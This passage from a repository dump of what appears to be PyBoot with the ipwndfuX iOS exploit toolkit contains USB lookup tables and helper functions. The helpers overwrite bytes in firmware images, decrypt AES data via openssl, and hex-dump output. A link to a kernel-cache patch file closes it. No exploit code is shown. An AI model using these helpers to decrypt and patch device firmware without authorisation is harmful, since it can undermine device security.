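    (not copied, and whatever its typecode). Anything array.array('B', ...)
    accepts is converted directly. Text that the constructor rejects is
    encoded as UTF-8 first.

    Raises:
        TypeError: if *data* cannot be turned into bytes at all.
    """
    if data is None:
        return array.array('B')

    if isinstance(data, array.array):
        return data

    try:
        return array.array('B', data)
    except TypeError:
        # When you pass a unicode string or a character sequence,
        # you get a TypeError if the first parameter does not match
        a = array.array('B')
        encode = getattr(data, 'encode', None)
        if encode is not None:
            data = encode('utf-8')
        # array.fromstring() was removed in Python 3.9; frombytes() is its
        # replacement and is absent on the oldest supported interpreters.
        load = getattr(a, 'frombytes', None)
        if load is None:
            load = a.fromstring
        load(data)
        return a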
99 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
# bDescriptorType value -> human-readable descriptor name.
descriptors = {
    0x01: "Device",
    0x02: "Configuration",
    0x03: "String",
    0x04: "Interface",
    0x05: "Endpoint",
    0x06: "Device qualifier",
    0x07: "Other speed configuration",
    0x08: "Interface power",
    0x09: "OTG",
    0x0A: "Debug",
    0x0B: "Interface association",
    0x0C: "Security",
    0x0D: "Key",
    0x0E: "Encryption type",
    0x0F: "Binary device object store (BOS)",
    0x10: "Device capability",
    0x11: "Wireless endpoint companion",
    0x30: "SuperSpeed endpoint companion",
}

# Class code reported at device level -> name.
device_classes = {
    0x00: "Specified at interface",
    0x02: "Communications Device",
    0x09: "Hub",
    0x0F: "Personal Healthcare Device",
    0xDC: "Diagnostic Device",
    0xE0: "Wireless Controller",
    0xEF: "Miscellaneous",
    0xFF: "Vendor-specific",
}

# Class code reported at interface level -> name.
interface_classes = {
    0x00: "Reserved",
    0x01: "Audio",
    0x02: "CDC Communication",
    0x03: "Human Interface Device",
    0x05: "Physical",
    0x06: "Image",
    0x07: "Printer",
    0x08: "Mass Storage",
    0x09: "Hub",
    0x0A: "CDC Data",
    0x0B: "Smart Card",
    0x0D: "Content Security",
    0x0E: "Video",
    0x0F: "Personal Healthcare",
    0xDC: "Diagnostic Device",
    0xE0: "Wireless Controller",
    0xEF: "Miscellaneous",
    0xFE: "Application Specific",
    0xFF: "Vendor Specific",
}

# Endpoint transfer type code -> name.
ep_attributes = {
    0x00: "Control",
    0x01: "Isochronous",
    0x02: "Bulk",
    0x03: "Interrupt",
}

# Scale of one max-power unit, in mA.
MAX_POWER_UNITS_USB2p0 = 2
MAX_POWER_UNITS_USB_SUPERSPEED = 8
95 |
--------------------------------------------------------------------------------
/resources/ipwndfuX/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
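def apply_patches(binary, patches):
    """Return *binary* with every ``(offset, data)`` patch written over it.

    Patches are applied in order, each one overwriting len(data) bytes
    starting at offset. A patch that runs past the end makes the result
    longer. The input object itself is not modified.

    Raises:
        ValueError: if an offset is negative or lies beyond the end of the
            image. Slicing would otherwise accept it silently and place
            the data somewhere other than the requested offset.
    """
    for (offset, data) in patches:
        if offset < 0 or offset > len(binary):
            raise ValueError(
                'patch offset %r is outside the %d-byte image' % (offset, len(binary)))
        binary = binary[:offset] + data + binary[offset + len(data):]
    return binary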
7 |
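def aes_decrypt(data, iv, key):
    """Decrypt *data* with AES-CBC by piping it through the ``openssl`` CLI.

    *key* and *iv* are handed to openssl as its -K and -iv values. A key of
    32 characters selects AES-128 and one of 64 characters selects AES-256.
    Padding is not removed (-nopad). Returns whatever openssl writes to
    stdout.

    Prints an error and exits the process with status 1 on a bad key
    length, a non-zero openssl exit status, or any output on stderr.
    """
    if len(key) == 32:
        aes = 128
    elif len(key) == 64:
        aes = 256
    else:
        # Single-argument print(...) prints the same text on Python 2 and
        # also parses on Python 3.
        print('ERROR: Bad AES key given to aes_decrypt. Exiting.')
        sys.exit(1)

    # NOTE(review): the key and IV travel on the openssl command line, where
    # other local users can typically read them from the process list while
    # the child runs. Avoid calling this with sensitive keys on shared hosts.
    p = subprocess.Popen(['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key],
                         stdout=subprocess.PIPE,
                         stdin=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    (stdout, stderr) = p.communicate(input=data)

    # Any stderr output counts as failure, even with a zero exit status.
    if p.returncode != 0 or len(stderr) > 0:
        print('ERROR: openssl failed: %s' % stderr)
        sys.exit(1)

    return stdout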
28 |
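def hex_dump(data, address):
    """Return a hex dump of *data* produced by the external ``xxd`` tool.

    *address* is passed to xxd as its -o value. Prints an error and exits
    the process with status 1 when xxd returns non-zero or writes anything
    to stderr.
    """
    p = subprocess.Popen(['xxd', '-o', str(address)],
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    (stdout, stderr) = p.communicate(input=data)

    if p.returncode != 0 or len(stderr) > 0:
        # Single-argument print(...) prints the same text on Python 2 and
        # also parses on Python 3.
        print('ERROR: xxd failed: %s' % stderr)
        sys.exit(1)

    return stdout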
38 |
--------------------------------------------------------------------------------
/resources/kc.bpatch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/kc.bpatch
--------------------------------------------------------------------------------